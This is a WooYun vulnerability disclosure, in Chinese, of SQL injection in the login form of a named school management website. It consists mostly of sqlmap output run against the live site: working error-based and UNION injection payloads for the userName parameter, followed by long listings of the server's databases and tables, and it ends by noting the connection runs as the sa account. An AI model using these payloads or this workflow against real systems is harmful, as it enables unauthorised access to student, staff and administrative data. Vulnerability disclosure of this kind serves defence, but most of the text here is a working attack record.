WooYun.org

/Login!showLogin.do

这个地址下存在盲注漏洞
C:\Python27\SqlMap>sqlmap.py -u "http://www.xmxayz.com/Login!showLogin.do" --for
ms
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150313}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:11:50
[10:11:50] [INFO] testing connection to the target URL
[10:11:51] [INFO] searching for forms
[#1] form:
POST http://www.xmxayz.com:80/Login!singleSysChkLogin.do
POST data: userName=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%94%A8%E6%88%B7%E5%90%8D&passw
ord=&signup_password=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&rememberPwd=0
&rememberCookie=0&btnSubmit=
do you want to test this form? [Y/n/q]
>
Edit POST data [default: userName=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%94%A8%E6%88%B7%
E5%90%8D&password=&signup_password=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81
&rememberPwd=0&rememberCookie=0&btnSubmit=] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n]
[10:11:58] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:11:58] [INFO] using 'C:\Users\Administrator\.sqlmap\output\results-03292015_
1011am.csv' as the CSV results file in multiple targets mode
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: userName (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: userName=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%94%A8%E6%88%B7%E5%90%8D' AN
D 1185=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(113)+(SE
LECT (CASE WHEN (1185=1185) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107
)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'OavH'='OavH&password=XVvI&signup_password
=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&rememberPwd=0&rememberCookie=0&bt
nSubmit=InuZ
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: userName=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%94%A8%E6%88%B7%E5%90%8D' UN
ION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(
106)+CHAR(113)+CHAR(65)+CHAR(105)+CHAR(73)+CHAR(99)+CHAR(80)+CHAR(100)+CHAR(97)+
CHAR(114)+CHAR(107)+CHAR(90)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113),N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=XVvI&signup_passwor
d=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&rememberPwd=0&rememberCookie=0&b
tnSubmit=InuZ
---
do you want to exploit this SQL injection? [Y/n]
[10:12:06] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[10:12:06] [INFO] you can find results of scanning in multiple targets mode insi
de the CSV file 'C:\Users\Administrator\.sqlmap\output\results-03292015_1011am.c
sv'
[*] shutting down at 10:12:06
表有点多 不好截图直接就代码了
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
Database: xayz
[507 tables]
+---------------------------------------------------+
| EX_EXPENSE_AUDIT |
| EX_EXPENSE_AUDIT |
| EX_EXPENSE_ITEM |
| EX_LEAVE_APPLY |
| EX_LEAVE_APPROVE |
| EX_PURCHASE_ITEM |
| EX_PURCHASE_ITEM |
| EX_TRACE_BUG |
| FCS_AREA |
| FCS_BILL |
| FCS_BILLSUB |
| FCS_DATADICT |
| FCS_DEPT |
| FCS_DW |
| FCS_DWTYPE |
| FCS_EMPLOYEE1 |
| FCS_EMPLOYEE1 |
| FCS_EMPLOYEE2 |
| FCS_GROUP |
| FCS_INTBILL |
| FCS_INTBILLSUB |
| FCS_ITEM |
| FCS_MOREPK |
| FC_ATTACH |
| FC_BILLZL |
| FC_DATADICT |
| FC_EBDS |
| FC_ENTITY |
| FC_ENTITYSUB |
| FC_MAXBH |
| FC_QUERY |
| FC_REPORTFILE |
| KJ_CWSH_ITEM |
| KJ_CWSH_ITEM |
| KJ_LEAVE |
| KJ_SYJX_ITEM |
| KJ_SYJX_ITEM |
| MC_OperatorLog |
| Mc_MorningCheck |
| Mc_Symptom |
| Tea_AdminRank |
| Tea_BaseCase |
| Tea_BasedCurriculum |
| Tea_CheckRights |
| Tea_ClassAdviser |
| Tea_ContinuingEdu |
| Tea_DaiJiao |
| Tea_Dictionary |
| Tea_Eduschool |
| Tea_GuideStudent |
| Tea_Honor |
| Tea_InfoAuditNotice |
| Tea_JoBTitleInfo |
| Tea_MajorWorks |
| Tea_OpenClass |
| Tea_ProjectLearning |
| Tea_ProjectLearning |
| Tea_Rights |
| Tea_SkilledLevel |
| Tea_TeachInfo |
| Tea_TeacherSupport |
| Tea_Thesis |
| Tea_TopicSeminar |
| Tea_Train |
| Tea_WorkExperiences |
| Tea_YearExamining |
| Tea_listenClass |
| Tea_visitLesson |
| VIEW_CarApply |
| VIEW_CheckRights |
| VIEW_FileRefer |
| VIEW_Maintain |
| View_CardLog |
| View_DormRoomInfo |
| View_DormRoomInfo |
| View_DutyInfoNew |
| View_DutyType |
| View_EvaluateResult |
| View_HomeWork |
| View_MRepair |
| View_Message |
| View_OnlineCount |
| View_PrintRequest |
| View_PrintTotal |
| View_SchoolSubSystem |
| View_StuScoreEvent |
| View_StudentLeave |
| View_UntreatedNew |
| View_UntreatedNew |
| View_UserRole |
| View_detailgroup |
| WF_COMMON_CHECK |
| WF_CURRENTSTEP_PREV |
| WF_CURRENTSTEP_PREV |
| WF_DEFS_TYPE |
| WF_DSN_CLASS |
| WF_DSN_STATUS |
| WF_DYNAMIC_INSTANCE_PARAM |
| WF_DYNAMIC_INSTANCE_PARAM |
| WF_GROUP_ROLE |
| WF_GROUP_ROLE |
| WF_HISTORYSTEP_PREV |
| WF_HISTORYSTEP_PREV |
| WF_KEY_SEED |
| WF_MY_FLOW |
| WF_PROPERTYENTRY |
| WF_REMINDER_FORM |
| WF_REMINDER_MESSAGE |
| WF_ROLE |
| WF_STEPIDS |
| WF_TASK_COPY_USER |
| WF_TASK_FORM |
| WF_TASK_INFO_USER |
| WF_TASK_INFO_USER |
| WF_TASK_REMINDER |
| WF_TASK_WORKITEM |
| WF_USER_GRANT |
| WF_USER_GRANT |
| WF_USER_GROUP |
| WF_USER_ROLE |
| WF_WFENTRY_PARAM |
| WF_WFENTRY_PARAM |
| WF_WFENTRY_SUB |
| WF_WORKFLOWDEFS |
| ams_article |
| ams_circles |
| ams_class |
| ams_like |
| ams_links |
| ams_review |
| ams_styles |
| ams_users |
| bf_document |
| bm_bmbmc |
| bm_ibm |
| bm_kc |
| bm_kmsz |
| bm_xscj |
| bm_zkz |
| bm_zt |
| category |
| doc_docManage |
| doc_docType |
| doc_docuTemp |
| doc_docuVie |
| doc_docudetailfil |
| doc_docufil |
| doc_document |
| doc_documentType |
| doc_docuno |
| doc_flowInfo |
| doc_prompt |
| dtproperties |
| eva_BasicInfo |
| eva_BasicInfoVoteItem |
| eva_BeEvalTeacher |
| eva_Detail |
| eva_DimUser |
| eva_Dimensional |
| eva_DinfoDetail |
| eva_EvaLimit |
| eva_ItemOptions |
| eva_Question |
| eva_SectionGroup |
| eva_SimpleEvaQuestion |
| eva_SimpleEvaText |
| eva_TeacherDimenTotal |
| eva_TeacherGroupScoreDimen |
| eva_TeacherGroupScoreItem |
| eva_TeacherScoreDimenPerBasicInfo |
| eva_TeacherScoreDimenPerBasicInfo |
| eva_TeacherScoreItem |
| eva_TeacherSingleDimenScore |
| eva_TeacherVoteCount |
| eva_VoteItem |
| exam_bj |
| exam_bjqksbdj |
| exam_fsdmx |
| exam_fsdmx |
| exam_fsdmx |
| exam_fsdzbmx |
| exam_fsdzbmx |
| exam_gradeZfFh |
| exam_ksmc |
| exam_kszbbjmx |
| exam_kszbbjmx |
| exam_kszbbjxk |
| exam_kszbfsdmx |
| exam_kszbfsdmx |
| exam_kszblb |
| exam_kszblrry |
| exam_kszbxkhb |
| exam_kszbxscj |
| exam_pyk |
| exam_xkfsdsz |
| exam_xkpxmx |
| exam_xkpxmx |
| exam_xscj |
| exam_xspy |
| fix_SchoolYearInfo |
| fix_appro |
| fix_asset |
| fix_asstype |
| fix_bill |
| fix_com |
| fix_cred |
| fix_datatree |
| fix_detail |
| fix_durdetail |
| fix_gencred |
| fix_goods |
| fix_iorel |
| fix_midsto |
| fix_place |
| fix_placeUserFlow |
| fix_pope |
| fix_stodetail |
| fix_stodetail |
| fix_sys |
| fix_target |
| fix_type |
| fix_wxlb |
| flc_task |
| flc_userlog |
| js_syjsgl |
| js_sytzdmx |
| js_sytzdmx |
| kj_free_check |
| kj_free_check |
| kj_lxsq |
| kj_pcgl |
| lsb |
| sch_class |
| sch_user_info |
| sch_user_info |
| tbl_Action |
| tbl_AddressBook |
| tbl_AdjustmentLesson |
| tbl_AnswerList |
| tbl_BackUp |
| tbl_BlogConfig |
| tbl_CarApply |
| tbl_CarApply |
| tbl_CardLog |
| tbl_CheckRoll |
| tbl_ClassInfo |
| tbl_Company |
| tbl_Config |
| tbl_ConnUser |
| tbl_ContactGroup |
| tbl_CourseGrade |
| tbl_CourseGrade |
| tbl_CoursePlan |
| tbl_CourseTime |
| tbl_CustomMenu |
| tbl_Department |
| tbl_DoorPriority |
| tbl_DormBuilding |
| tbl_DormCheckMain |
| tbl_DormCheckResult |
| tbl_DormCheckRule |
| tbl_DormNotice |
| tbl_DormRoomInfo |
| tbl_DormRoomInfo |
| tbl_DutyAccessControl |
| tbl_DutyCheckRoll |
| tbl_DutyExp |
| tbl_DutyGroupCheck |
| tbl_DutyGroupCheck |
| tbl_DutyGroupUser |
| tbl_DutyGroupWork |
| tbl_DutyStudent |
| tbl_DutyTeacher |
| tbl_Employee |
| tbl_EvaluateMain |
| tbl_EvaluateResult |
| tbl_EvaluateRule |
| tbl_ExamClassMain |
| tbl_ExamClassRank |
| tbl_ExamClassStat |
| tbl_ExamEntrance |
| tbl_ExamMain |
| tbl_ExamMode |
| tbl_ExamPlace |
| tbl_ExamPlan |
| tbl_ExamPriority |
| tbl_ExamRankBase |
| tbl_ExamRankBase |
| tbl_ExamRankMain |
| tbl_ExamResult |
| tbl_ExamStat |
| tbl_ExamStudentStat |
| tbl_ExamStype |
| tbl_ExamType |
| tbl_ExcelSearch |
| tbl_ExcelSearchType |
| tbl_ExceptionCards |
| tbl_FestivalStyle |
| tbl_FileLaunch |
| tbl_FileRefer |
| tbl_FloatPic |
| tbl_GlyOnlineSignup |
| tbl_GlyZSResume |
| tbl_GradeCode |
| tbl_GradeCode |
| tbl_Group |
| tbl_GroupUser |
| tbl_Holiday |
| tbl_HomeWork |
| tbl_IOSConfig |
| tbl_IOSForm |
| tbl_IOSUser |
| tbl_JobMarketCompany |
| tbl_JobMarketCompany |
| tbl_JobRecruit |
| tbl_JobSeek |
| tbl_JobSeek |
| tbl_LeaveApply |
| tbl_LinkType |
| tbl_Links |
| tbl_ListenerVisitRecord |
| tbl_Log |
| tbl_MRepair |
| tbl_MailBox |
| tbl_Maintain |
| tbl_MaintainUnit |
| tbl_Major |
| tbl_MarkRule |
| tbl_MarkType |
| tbl_Meeting |
| tbl_Mimeograph |
| tbl_Minutes |
| tbl_MsgAttachment |
| tbl_MsgAttachment |
| tbl_MsgBoard |
| tbl_MsgRollNews |
| tbl_MsgSub |
| tbl_MsgType |
| tbl_MultiApply |
| tbl_MultiResource |
| tbl_MyFriend |
| tbl_NewsAttachment |
| tbl_NewsAuditReason |
| tbl_NewsFeedback |
| tbl_NewsInfo |
| tbl_NewsShare |
| tbl_Notice |
| tbl_OnlineAsk |
| tbl_OnlineCount |
| tbl_OnlineForm |
| tbl_OnlineFormResult |
| tbl_OnlinePsy |
| tbl_OnlineQuestion |
| tbl_OnlineSeek |
| tbl_OnlineSignup |
| tbl_OutBookIn |
| tbl_OverTimeApply |
| tbl_PersonalCalendar |
| tbl_Photo |
| tbl_Position |
| tbl_Post |
| tbl_PrintFileType |
| tbl_PrintFileType |
| tbl_PrintRequest |
| tbl_PrintResponse |
| tbl_PrintRoom |
| tbl_PrintType |
| tbl_QuestionInfo |
| tbl_QuickLink |
| tbl_Repair |
| tbl_ResuleQuery |
| tbl_RoleAction |
| tbl_RoleAction |
| tbl_RoleSchoolSubSystem |
| tbl_RoleTypeTree |
| tbl_Rss |
| tbl_SalaryList |
| tbl_SalaryList |
| tbl_SalaryType |
| tbl_SchoolAcadYear |
| tbl_SchoolAcadYear |
| tbl_SchoolCalendar |
| tbl_SchoolConfig |
| tbl_SchoolLevel |
| tbl_SchoolSubSystem |
| tbl_SchoolTemplate |
| tbl_ScoreFile |
| tbl_Section |
| tbl_StuAction |
| tbl_StuScore |
| tbl_StudentBaseScore |
| tbl_StudentBaseScore |
| tbl_StudentClass |
| tbl_StudentEvent |
| tbl_StudentFlow |
| tbl_StudentFlowType |
| tbl_StudentLeave |
| tbl_StudentScoreEvent |
| tbl_StudentScoreEvent |
| tbl_StudentScoreRule |
| tbl_SubSystem |
| tbl_Subject |
| tbl_SubjectRealm |
| tbl_SysCurrentVisit |
| tbl_SysFrameConfig |
| tbl_SysMsgAwoke |
| tbl_SysQuickLink |
| tbl_SysSiteStyle |
| tbl_SysVisitCount |
| tbl_Teacher |
| tbl_Terminal |
| tbl_TypeTreeFlag |
| tbl_TypeTreeFlag |
| tbl_User |
| tbl_UserRole |
| tbl_VisitAim |
| tbl_VisitInfo |
| tbl_WatchList |
| tbl_WatchMain |
| tbl_Watchzb |
| tbl_WeekMemo |
| tbl_WorkTime |
| tbl_WorkType |
| tbl_area |
| tbl_docManage |
| tbl_docuTemp |
| tbl_docuVie |
| tbl_docudetailfil |
| tbl_docufil |
| tbl_document |
| tbl_documentType |
| tbl_docuno |
| tbl_flowInfo |
| tbl_ksmc |
| tbl_logsum |
| tbl_lsb |
| tbl_outbookType |
| tbl_prompt |
| tbl_subStyle |
| tbl_test |
| tbl_webdisk |
| tbl_zxfk |
| test |
| users |
| view_ClassInfo |
| view_CourseGrade |
| view_CourseGrade |
| view_CoursePlan |
| view_DormCheckTotal |
| view_DutyStudent |
| view_DutyTeacher |
| view_ExamClassRank |
| view_ExamClassStat |
| view_ExamMain |
| view_ExamPlan |
| view_ExamResult |
| view_ExamStat |
| view_ExamStudentStat |
| view_FlowDocTypeNew |
| view_FlowDocTypeNew |
| view_Grade |
| view_GroupUser |
| view_IosUser |
| view_MultiApply |
| view_PrintResponse |
| view_StudentEvent |
| view_StudentFlow |
| view_UserSubSystem |
| view_UserTypeTree |
| view_allcred |
| view_bm |
| view_credgroup |
| view_fs |
| view_kszbxscj |
| view_newsInfo |
| view_newsfeedback |
| view_outbookin |
| view_salaryList |
| view_schoolInfo |
| view_studentInfo |
| view_sytzdmx |
| view_teacherInfo |
| view_userAction |
| view_userAction |
| view_xdsStuCards |
| view_xdsStuStarffjl |
| view_xdsStuStars |
| view_xscj |
| xds_apply |
| xds_approve |
| xds_baseConfig |
| xds_cause |
| xds_flowFlagClass |
| xds_honorClass |
| xds_honorType |
| xds_stuCardsNumPerMonth |
| xds_stuHzRecord |
| xds_stuZhangNum |
| xds_surplusCardsNum |
| xds_teacherRemaining |
| yy_jsgl |
| yy_jslx |
| yy_jstp |
| yy_kjsz |
| yy_tzyy |
| yy_yysq |
| yy_yysz |
+---------------------------------------------------+
Database: ywxxDMS
[55 tables]
+---------------------------------------------------+
| VIEW_FileRefer |
| View_FileInfoAll |
| View_FileInfoAll |
| View_FileType |
| View_FileVisitShare |
| View_Message |
| View_MyFriend |
| View_TreeVisitShare |
| dtproperties |
| tbl_Action |
| tbl_Action |
| tbl_BackUp |
| tbl_Config |
| tbl_Department1 |
| tbl_Department1 |
| tbl_FileHistory |
| tbl_FileInfo |
| tbl_FileLaunch |
| tbl_FileRefer |
| tbl_LoginLog |
| tbl_LoginLog |
| tbl_MsgAttachment |
| tbl_MsgAttachment |
| tbl_MsgSub |
| tbl_MyFriend |
| tbl_PersonalCalendar |
| tbl_Position1 |
| tbl_Position1 |
| tbl_RoleAction |
| tbl_RoleAction |
| tbl_RoleTypeTree |
| tbl_TempletTypeTree |
| tbl_Theme |
| tbl_TypeTreeFlag |
| tbl_TypeTreeFlag |
| tbl_TypeTreeRole |
| tbl_User1 |
| tbl_User1 |
| tbl_UserGroup1 |
| tbl_UserGroup1 |
| tbl_UserInfo1 |
| tbl_UserInfo1 |
| tbl_UserProperty |
| tbl_UserRole |
| tbl_companyInfo |
| tbl_cs |
| tbl_templet |
| tbl_userBrowseFile |
| tbl_userFileVisit |
| tbl_userTypeTree |
| view_UserTypeTree |
| view_userAction |
| view_userAction |
| view_userTypeShow |
| xdb_files |
+---------------------------------------------------+
Database: master
[290 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.credentials |
| sys.crypt_properties |
| sys.data_spaces |
| sys.database_files |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_connections |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_performance_counters |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_event_notifications |
| sys.server_events |
| sys.server_permissions |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.sql_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats_columns |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.syssegments |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+---------------------------------------------------+
Database: sjzx
[76 tables]
+---------------------------------------------------+
| T_City |
| T_District |
| T_Province |
| View_ClassInfo |
| View_CourseGrade |
| View_CourseGrade |
| View_CoursePlan |
| View_Grade |
| View_GroupUser |
| View_SchoolInfo |
| View_SchoolSubSystem |
| View_StuParentsInfo |
| View_StudentFlow |
| View_StudentInfo |
| View_Sysuser |
| View_TeacherInfo |
| View_UserAction |
| View_UserAction |
| View_UserRole |
| View_UserSubSystem |
| app_system |
| category |
| dtproperties |
| tbl_Action |
| tbl_BackUp |
| tbl_CardLog |
| tbl_ClassInfo |
| tbl_Config |
| tbl_CourseGrade |
| tbl_CourseGrade |
| tbl_CoursePlan |
| tbl_CourseTime |
| tbl_Department |
| tbl_DutyExp |
| tbl_GradeCode |
| tbl_GradeCode |
| tbl_Group |
| tbl_GroupUser |
| tbl_Log |
| tbl_Logsum |
| tbl_Major |
| tbl_ParentsUsers |
| tbl_Photo |
| tbl_Position |
| tbl_RoleAction |
| tbl_RoleAction |
| tbl_RoleSchoolSubSystem |
| tbl_SchoolAcadYear |
| tbl_SchoolAcadYear |
| tbl_SchoolCalendar |
| tbl_SchoolConfig |
| tbl_SchoolLevel |
| tbl_SchoolSubSystem |
| tbl_SchoolTemplate |
| tbl_Section |
| tbl_StuAction |
| tbl_StudentFamily |
| tbl_StudentFamily |
| tbl_StudentFlow |
| tbl_StudentFlowType |
| tbl_StudentFull |
| tbl_StudentHistory |
| tbl_StudentPrimal |
| tbl_SubSystem |
| tbl_Subject |
| tbl_SubjectRealm |
| tbl_SysUser |
| tbl_Teacher |
| tbl_User |
| tbl_UserRole |
| tbl_WeekMemo |
| tbl_WorkTime |
| tbl_delData |
| tbl_lsb |
| users |
| view_StudentFull |
+---------------------------------------------------+
Database: msdb
[92 tables]
+---------------------------------------------------+
| MSdatatype_mappings |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfilegroup |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary_databases |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtslog90 |
| sysdtspackagefolders90 |
| sysdtspackagelog |
| sysdtspackages90 |
| sysdtspackages90 |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobstepslogs |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments_transfer |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profileaccount |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_logdetail |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysnotifications |
| sysoperators |
| sysoriginatingservers_view |
| sysoriginatingservers_view |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysschedules_localserver_view |
| sysschedules_localserver_view |
| syssessions |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
+---------------------------------------------------+
当前用户 sa，所以。。。。

由于官网的表有点多，就不跑了，直接给个证明把。
